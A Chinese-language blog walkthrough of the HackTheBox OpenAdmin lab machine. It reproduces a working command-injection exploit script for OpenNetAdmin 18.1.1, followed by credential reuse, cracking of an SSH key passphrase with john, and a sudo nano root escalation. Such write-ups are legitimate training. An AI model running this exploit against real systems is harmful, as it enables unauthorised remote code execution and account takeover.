文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-02-10   2.1k

HTB::OpenAdmin Walkthrough

0x01 基本信息

0x02 使用工具和知识点

  • nmap
  • dirbuster
  • ssh2john.py
  • john
  • opennetadmin v18.1.1 exploit
  • netstat -tulpn
  • nano

0x03 渗透测试过程

端口探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[email protected]:~# nmap -sC -sV -T5 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-07 18:31 HKT
Nmap scan report for 10.10.10.171
Host is up (0.14s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
993/tcp closed imaps
1025/tcp closed NFS-or-IIS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.12 seconds

目标靶机开放了22 SSH和80 HTTP端口,其中80端口上运行着Apache服务,我们在浏览器中直接访问该端口,发现是Apache的默认起始页:

目录探测

使用DirBuster工具和Kali自带的字典directory-list-2.3-medium.txt对站点进行目录爆破:

DirBuster暂时就放在后台,目前爆破出来的主要是两个目录:onamusic。我们直接尝试http://10.10.10.171/ona/页面:

有一个DOWNLOAD链接,点进去看一下,发现是OpenNetAdmin官网,并且当前的版本号是v18.1.1

OpenNetAdmin is an opensource IP Address Management (IPAM) system.

直接去Google一下opennetadmin v18.1.1 exploit,发现ExploitDB列出了两个exploit:

https://www.exploit-db.com/exploits/47691

https://www.exploit-db.com/exploits/47772

漏洞利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

将上面的Bash脚本保存到Kali,并执行命令,可以得到反弹shell:

1
bash ona.sh http://10.10.10.171/ona/

经过测试发现,当前用户是www-data,不能执行cd命令离开当前目录,用find / -type d -user www-data查看有权限访问的目录。

  • find - is a linux command to find anything like file or directory.
  • The first argument i.e / is the place to perform the search.
  • -type - It takes f or d resembling what we are searching.
    • f - For files
    • d - For directories
  • -user - This tells in connection to which user. This command will search all the files that have permission for www-data under /(complete file system)

内容太多这里就不贴结果了,基本上就是/opt/ona/www//var/www/ona/两个目录,首先去看config配置文件:

查看config.inc.php,发现有一个数据库的配置文件:

1
2
// Include the localized Database settings
$dbconffile = "{$base}/local/config/database_settings.inc.php";

找到了mysql的登录用户密码:n1nj4W4rri0R!,再看一下/var/www/目录,发现有一个internal目录属于Jimmy用户,用Jimmy和mysql的密码登录SSH。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[email protected]:~$ cd /var/www/internal
[email protected]:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23 17:43 .
drwxr-xr-x 4 root root 4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php
[email protected]:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

mian.php文件提示通过登录认证jimmy用户输出另一个用户joanna的rsa密钥,现在我们就需要知道,这个服务运行在哪个端口上

1
2
3
4
5
6
7
8
9
10
11
jimm[email protected]:~$ curl http://localhost/main.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at localhost Port 80</address>
</body></html>

不是普通的80端口,运行netstat -tulpn命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
[email protected]:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -

列出来的端口中最有可能的就是52846:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
url http://localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

解密rsa得到一个密码叫bloodninjas

1
2
3
4
5
6
7
8
9
10
11
12
13
[email protected]:~/Desktop$ python /usr/share/john/ssh2john.py joanna_rsa > joanna_rsa.hash
[email protected]:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt joanna_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (joanna_rsa)
1g 0:00:00:16 DONE (2020-02-09 08:19) 0.06172g/s 885290p/s 885290c/s 885290C/sa6_123..*7¡Vamos!
Session completed

经尝试这个密码并不是joanna的ssh连接密码,而是利用密钥连接ssh时对私钥的验证密码。之后连接到joanna的ssh,注意一定要将私钥的文件权限设置为700:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
[email protected]:~/Desktop$ chmod 700 joanna_rsa
[email protected]:~/Desktop$ ssh -i joanna_rsa [email protected]
Enter passphrase for key 'joanna_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Feb 9 14:18:59 UTC 2020

System load: 1.04 Processes: 164
Usage of /: 49.6% of 7.81GB Users logged in: 2
Memory usage: 24% IP address for ens160: 10.10.10.171
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Feb 9 14:17:21 2020 from 10.10.15.190
[email protected]:~$

接下来就可以很简单的找到user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[email protected]:~$ ls -la
total 48
drwxr-x--- 6 joanna joanna 4096 Feb 9 14:17 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
-rw-rw-r-- 1 joanna joanna 64 Feb 9 14:02 0
lrwxrwxrwx 1 joanna joanna 9 Nov 22 18:02 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna 220 Nov 22 18:00 .bash_logout
-rw-r--r-- 1 joanna joanna 3771 Nov 22 18:00 .bashrc
drwx------ 2 joanna joanna 4096 Nov 22 22:42 .cache
drwx------ 3 joanna joanna 4096 Nov 22 22:42 .gnupg
drwxrwxr-x 3 joanna joanna 4096 Nov 22 18:53 .local
-rw------- 1 joanna joanna 86 Feb 9 14:17 nano.save
-rw-r--r-- 1 joanna joanna 807 Nov 22 18:00 .profile
drwx------ 2 joanna joanna 4096 Nov 23 17:31 .ssh
-rw-rw-r-- 1 joanna joanna 33 Nov 28 09:37 user.txt
[email protected]:~$ cat user.txt
c9b2c[--------------]f0c81b5f

sudo -l命令显示用户Joanna能够以root用户身份运行/bin/nano /opt/priv,而无需输入密码。 当看到用户可以以root用户身份运行nano时,这是最简单的利用方法。

1
2
3
4
5
6
7
[email protected]:/$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv

就可以得到/root/root.txt文件:

0x04 Reference

https://decdeg.com/hackthebox-open-admin-10-10-10-171/

https://www.jianshu.com/p/9f1f9145ac3f

https://xz.aliyun.com/t/3958#toc-1

Copyright © ca01h 2019-2020 | 本站总访问量